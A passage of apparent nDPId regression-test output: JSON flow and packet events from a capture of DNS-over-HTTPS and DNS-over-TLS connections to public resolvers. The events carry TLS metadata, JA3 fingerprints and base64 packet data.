6OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"}
00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3Cr0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="}
01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDszY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqB